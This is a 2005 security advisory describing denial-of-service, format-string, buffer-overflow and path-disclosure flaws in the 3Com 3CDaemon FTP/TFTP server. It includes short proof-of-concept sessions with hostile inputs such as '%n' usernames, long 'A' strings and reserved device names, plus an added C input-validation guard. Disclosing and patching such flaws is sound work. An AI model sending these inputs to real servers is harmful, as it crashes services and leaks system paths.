Packet Storm advisory PACKETSTORM:35602 (packetstormsecurity.com), posted Jan 05, 2005, author Sowhat
File: ad20041011.txt
3Com 3CDaemon Multiple Vulnerabilities
  
By Sowhat  
04.JAN.2005  
  
http://secway.org/advisory/ad20041011.txt  
[I.T.S] Security Research Team  
  
  
Product Affected:  
  
3Com 3CDaemon 2.0 revision 10   
  
Vendor:  
  
www.3Com.com  
  
  
(1) BACKGROUND
  
3CDaemon is a free, popular TFTP, FTP, and Syslog daemon for Microsoft Windows platforms, developed by dan_gill@3Com.
  
For more information,  
http://support.3com.com/software/utilities_for_windows_32_bit.htm  
ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip  
  
3CDaemon is full of holes; ISS and Wang Ning <[email protected]> have already reported some bugz about 3CDaemon
(see: http://xforce.iss.net/xforce/xfdb/8970
http://www.securityfocus.org/bid/11944
)

And I document some other well-known bugz here again :)
  
  
(2) Details  
  
Remote exploitation of multiple vulnerabilities in 3CDaemon allows attackers to execute arbitrary commands as the user running 3CDaemon (usually Administrator). Some of these vulnerabilities do not need a valid username and password to log in.

There are several vulnerabilities:
  
1. TFTP Reserved Device Name Denial of Service
  
D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn  
3CDaemon will crash with messages like
"Microsoft Visual C++ Runtime library"  
"Runtime Error!"  
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "  
"abnormal program termination".   
  
2. FTP Username Format String Vulnerability
  
H:\>ftp 192.168.0.1  
Connected to 192.168.0.1.  
220 3Com 3CDaemon FTP Server Version 2.0  
User (192.168.0.1:(none)): %n  
Connection closed by remote host.  
  
OR:  
H:\>ftp 192.168.0.1  
Connected to 192.168.0.1.  
220 3Com 3CDaemon FTP Server Version 2.0  
User (192.168.0.1:(none)): %s  
331 User name ok, need password  
Password:[anythinghere]  
530 Login access denied  
Login failed.  
ftp>  
  
And then 3CDaemon is dead.
  
3. FTP Long Username Buffer Overflow
  
D:\WINDOWS\system32>ftp 192.168.0.1  
Connected to 192.168.0.1.  
220 3Com 3CDaemon FTP Server Version 2.0  
User (192.168.0.1:(none)):  
501 Invalid or missing parameters  
Login failed.  
ftp> user AAA..[about 241 A here]...AAAAA  
Connection closed by remote host.  
  
4. Multiple FTP Command Long Parameter Buffer Overflow
Including: cd, send, ls, put, delete, rename, rmdir, literal, stat, CWD, and so on
(Maybe this is what ISS's advisory is talking about)
  
ftp> cd AAA..[about 398 A here]...AAAAA  
Connection closed by remote host.  
ftp>  
  
ftp> ls AAA..[about 247 A here]...AAAAA  
200 PORT command successful.  
Connection closed by remote host.  
  
ftp> put 1.txt AAA..[about 247 A here]...AAAAA  
200 PORT command successful.  
532 Need account for storing files  
Connection closed by remote host.  
  
It seems that the number of "A"s needed is different for every command.
  
5. Multiple FTP Command Format String
Including: cd, delete, rename, rmdir, literal, stat, CWD, and so on
  
230 User logged in  
ftp> cd %n  
Connection closed by remote host.  
ftp>   
  
  
6. Multiple FTP Command Reserved Device Name Information Leak
Including cd, and so on

The following commands will disclose the physical path of 3CDaemon:
  
ftp> cd aux  
550 aux : C:/3cdaemon/aux is not a directory!  
ftp> cd lpt1  
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!  
  
And also, CD to an existing filename will disclose the physical path too.
  
ftp> cd toolz.rar  
550 toolz.rar : C:/3cdaemon/toolz.rar is not a directory!  
  
There are still some other boring bugz, but it's enough : >
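An added example (my code, not 3Com's or the advisory's) of the input guard a fixed daemon would need in front of its FTP command handlers, covering the three bug classes above: a bounded copy with a length limit instead of an unchecked copy, rejection of reserved DOS device names after stripping directory and extension, and logging through a constant format string so "%n" in a user name is just text. The function names, the 255-byte MAX_ARG and the enum values are assumptions; the advisory gives no source.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed per-argument limit; the advisory reports crashes at ~241-398 bytes. */
#define MAX_ARG 255

enum { ARG_OK = 0, ARG_BAD_LENGTH, ARG_BAD_CHAR, ARG_RESERVED_DEVICE };

/* DOS device names Windows resolves in any directory and with any extension
 * ("aux", "C:/3cdaemon/aux" and "prn.txt" all open the device, not a file). */
static const char *reserved_devices[] = {
    "CON", "PRN", "AUX", "NUL",
    "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
    "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9", NULL };

/* 1 if the last path component, minus its extension, is a reserved device name. */
int is_reserved_device(const char *path) {
    const char *base = path;
    for (const char *p = path; *p; p++)
        if (*p == '/' || *p == '\\') base = p + 1;
    char stem[16];          /* real device names are at most 4 chars; longer stems never match */
    size_t n = 0;
    for (const char *p = base; *p && *p != '.' && n < sizeof stem - 1; p++)
        stem[n++] = (char)toupper((unsigned char)*p);
    stem[n] = '\0';
    for (int i = 0; reserved_devices[i]; i++)
        if (strcmp(stem, reserved_devices[i]) == 0) return 1;
    return 0;
}

/* Guard for one FTP argument (USER name, CWD/LIST/STOR path, ...) before it
 * reaches any file or logging routine: bounded copy into out[outsz] instead of
 * an unchecked strcpy, printable characters only, no reserved device names. */
int validate_ftp_arg(const char *in, char *out, size_t outsz) {
    size_t len = strlen(in);
    if (len == 0 || len > MAX_ARG || len >= outsz) return ARG_BAD_LENGTH;
    for (size_t i = 0; i < len; i++)
        if (!isprint((unsigned char)in[i])) return ARG_BAD_CHAR;   /* no CR/LF into logs */
    if (is_reserved_device(in)) return ARG_RESERVED_DEVICE;
    memcpy(out, in, len + 1);
    return ARG_OK;
}

/* The format string is a constant, so a user name of "%n" is logged as text. */
void log_login_attempt(const char *user) {
    fprintf(stderr, "login attempt: user=\"%s\"\n", user);
}
```

Note that validate_ftp_arg deliberately accepts "%n": the format-string bug is fixed by never passing user data as a format argument, not by filtering percent signs.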
  
(3) WORKAROUND  
  
Workaround? No......
  
(4) Vendor Response  
  
Since it seems that 3Com hasn't maintained 3CDaemon for a long, long time, I didn't
contact them :)
  
http://secway.org  
Thanks to all the members of the ITS Security Team